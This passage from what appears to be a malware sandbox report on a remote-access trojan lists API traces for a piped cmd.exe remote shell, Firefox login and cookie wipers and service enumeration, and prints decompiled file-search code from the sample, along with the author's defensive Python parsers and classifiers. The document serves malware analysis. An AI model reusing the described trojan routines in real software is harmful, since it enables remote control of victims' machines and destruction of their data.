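        "stderr_merged_into_stdout": si["hStdOutput"] == si["hStdError"] != 0,
        # pipe ends must be inheritable; CreateProcessA is also called with bInheritHandles = 1
        "pipe_handles_inheritable": sa["bInheritHandle"],
    }


if __name__ == "__main__":
    sa = decode_security_attributes(build_security_attributes())
    si = decode_startupinfo(build_startupinfo(0x1a4, 0x1a8))   # constructed handle values
    print(flag_names(si["dwFlags"]), shell_indicators(si, sa))
```

The same offsets explain the loop that follows in the API list: PeekNamedPipe and ReadFile run against the read end of the second pipe (the child's stdout/stderr), WriteFile against the write end of the first (the child's stdin), and the output is relayed over the socket set up by the `connect` subcall.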

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                  • GetLastError.KERNEL32 ref: 00411442
                                  • malloc.MSVCRT ref: 00411458
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 2829549728-0
                                  • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                  • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%
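
The "APIs" and "String ID" lists in the four function blocks above (the cmd.exe shell routine, the Firefox logins wiper, the service enumerator and the Firefox cookies wiper) are static cross-references pulled from the memory dump, not a runtime trace, so they show what each routine can do rather than what it did in this run. The following added example (mine, not part of the Joe Sandbox report or of Remcos) parses lists in that format and maps each block to capability tags; the rule names and the API/string combinations behind them are my own choices, and the two sample blocks are lines copied from the shell routine and the Firefox logins routine above.

```python
"""Map the per-function 'APIs' and 'String ID' lists of a sandbox report to
capability tags.  The sample blocks are lines copied from the report above."""
import re

API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[^\s(]+?)\.(?P<mod>[A-Za-z0-9_]+)(?:\(|\s+ref)")
STRING_LINE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")
REF = re.compile(r"ref:\s*([0-9A-Fa-f]{8})")
MANGLED_STRING = re.compile(r"^\?.*basic_string@([DG])")   # MSVC-decorated std::basic_string<char|wchar_t>

# A rule fires when every API in all_apis is present, at least one of any_apis
# (if given) is present and at least one any_strings substring (if given) occurs.
CAPABILITY_RULES = [
    {"name": "interactive shell over anonymous pipes",
     "all_apis": {"CreatePipe", "CreateProcessA", "WriteFile"},
     "any_apis": {"ReadFile", "PeekNamedPipe"}, "any_strings": ("cmd.exe",)},
    {"name": "socket connect inside the shell loop",
     "all_apis": {"connect"}, "any_apis": set(), "any_strings": ()},
    {"name": "Firefox saved-login wipe",
     "all_apis": {"FindFirstFileA", "DeleteFileA"}, "any_apis": set(),
     "any_strings": ("logins.json", "key3.db")},
    {"name": "Firefox cookie wipe",
     "all_apis": {"FindFirstFileA", "DeleteFileA"}, "any_apis": set(),
     "any_strings": ("cookies.sqlite",)},
    {"name": "service enumeration",
     "all_apis": {"OpenSCManagerA", "EnumServicesStatusW"}, "any_apis": set(), "any_strings": ()},
]


def normalise_api(name: str) -> str:
    """Collapse MSVCP60 std::basic_string exports so rules key on Win32 names."""
    m = MANGLED_STRING.match(name)
    if m:
        return "std::string" if m.group(1) == "D" else "std::wstring"
    return name


def parse_block(text: str):
    """Return ([{api, module, ref, via_subcall}, ...], [string, ...]) for one block."""
    apis, strings = [], []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            ref = REF.search(line)
            apis.append({"api": normalise_api(m["api"]), "module": m["mod"],
                         "ref": int(ref.group(1), 16) if ref else None,
                         "via_subcall": m["sub"] is not None})
            continue
        m = STRING_LINE.search(line)
        if m:
            strings.extend(s for s in m["ids"].split("$") if s)
    return apis, strings


def classify(apis: list, strings: list) -> list:
    names = {a["api"] for a in apis}
    tags = []
    for rule in CAPABILITY_RULES:
        if not rule["all_apis"] <= names:
            continue
        if rule["any_apis"] and not (rule["any_apis"] & names):
            continue
        if rule["any_strings"] and not any(n in s for n in rule["any_strings"] for s in strings):
            continue
        tags.append(rule["name"])
    return tags


# Sample input: lines copied from the shell routine and the Firefox logins routine above.
SHELL_BLOCK = r"""
• ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
• getenv.MSVCRT ref: 00402C34
• CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
• CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
• CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
  • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
• WriteFile.KERNEL32(00000000), ref: 00402EED
• TerminateProcess.KERNEL32(00000000), ref: 00402F21
• String ID: SystemDrive$cmd.exe
"""
FIREFOX_BLOCK = r"""
• getenv.MSVCRT ref: 004072D9
• FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
• FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
• DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
"""

if __name__ == "__main__":
    for block in (SHELL_BLOCK, FIREFOX_BLOCK):
        apis, strings = parse_block(block)
        print([a["api"] for a in apis], strings, classify(apis, strings))
```

Because the lists are static, a tag means the routine exists in the image, not that it ran; pair these tags with the dynamic evidence elsewhere in the report (process creation of cmd.exe with redirected handles, the DNS and socket activity) before treating them as observed behaviour.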

                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v13;
                                  				char _v14;
                                  				void* _v32;
                                  				char _v48;
                                  				short _v64;
                                  				char _v80;
                                  				char _v96;
                                  				void* _v112;
                                  				char _v128;
                                  				char _v144;
                                  				struct _WIN32_FIND_DATAW _v736;
                                  				char* _t73;
                                  				struct _WIN32_FIND_DATAW* _t75;
                                  				void* _t79;
                                  				void* _t81;
                                  				signed int _t96;
                                  				intOrPtr* _t137;
                                  				void* _t139;
                                  				void* _t141;
                                  				signed int _t145;
                                  
                                  				_t137 = __ecx;
                                  				_t60 =  &_v5;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                  				L00414146();
                                  				_t141 = _t139 + 0x1c;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                  				_v12 = FindFirstFileW( &_v64,  &_v64);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v12 == 0xffffffff) {
                                  					L11:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				while(FindNextFileW(_v12,  &_v736) != 0) {
                                  					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                  						L0041414C();
                                  						L00414152();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						_t141 = _t141 + 0x18;
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					}
                                  					_t71 =  &(_v736.cFileName);
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                  					_t141 = _t141 + 0x10;
                                  					_t73 =  &_a20;
                                  					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                  					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						L8:
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						continue;
                                  					} else {
                                  						_t75 =  &_v736;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						_t145 = _t141 - 0x10;
                                  						_t96 = _t145;
                                  						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                  						_t80 =  &_v96;
                                  						L00414140();
                                  						L00414140();
                                  						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
                                  						_t141 = _t145 + 0x30;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							return 0;
                                  						}
                                  						goto L8;
                                  					}
                                  				}
                                  				FindClose(_v12);
                                  				goto L11;
                                  			}
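As read from the decompiled E00404C0A above: the function takes a start directory (_a4) and a search term (_a20), appends "*" and calls FindFirstFileW, then iterates with FindNextFileW (the entry returned by FindFirstFileW itself is never examined, which on NTFS is normally "."). Entries with FILE_ATTRIBUTE_DIRECTORY (0x10) other than "." and ".." trigger a recursive call with the path extended by a separator and the entry name; every entry name is lowercased and searched for the term, and on a hit the whole 0x250-byte WIN32_FIND_DATAW record is copied verbatim into a std::string and handed to E00402440, which is not decompiled on this page (a return value of -1 aborts the walk). The following Python is an added example, not code from the sample or from this report: it decodes such raw records so that a buffer carved from a memory dump or a captured transfer can be turned back into a file listing, and it replicates the sample's lowercase-substring filter and its recursion test. The struct layout is the documented WIN32_FIND_DATAW; the records it runs on are constructed here for illustration.

```python
"""Decode 0x250-byte WIN32_FIND_DATAW records as serialized by E00404C0A.

Added example, not code from the sample or the report. The layout is the
documented Win32 WIN32_FIND_DATAW; SAMPLE_LISTING below is constructed.
"""
import struct
from datetime import datetime, timedelta, timezone

FIND_DATA_SIZE = 0x250            # 592 bytes, the length constant at 0x00404DCF
FILE_ATTRIBUTE_DIRECTORY = 0x10   # the mask tested before recursing
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# dwFileAttributes, ftCreationTime, ftLastAccessTime, ftLastWriteTime,
# nFileSizeHigh, nFileSizeLow, dwReserved0, dwReserved1,
# cFileName (260 WCHAR = 520 bytes), cAlternateFileName (14 WCHAR = 28 bytes)
_FMT = "<IQQQIIII520s28s"
assert struct.calcsize(_FMT) == FIND_DATA_SIZE


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return int((dt - _EPOCH_1601) / timedelta(microseconds=1)) * 10


def _wstr(raw):
    """UTF-16LE fixed-size field to str, cut at the first NUL."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def parse_find_data(buf):
    if len(buf) != FIND_DATA_SIZE:
        raise ValueError(f"expected {FIND_DATA_SIZE} bytes, got {len(buf)}")
    (attrs, ctime, atime, wtime, size_hi, size_lo,
     _res0, _res1, name_raw, alt_raw) = struct.unpack(_FMT, buf)
    return {
        "attributes": attrs,
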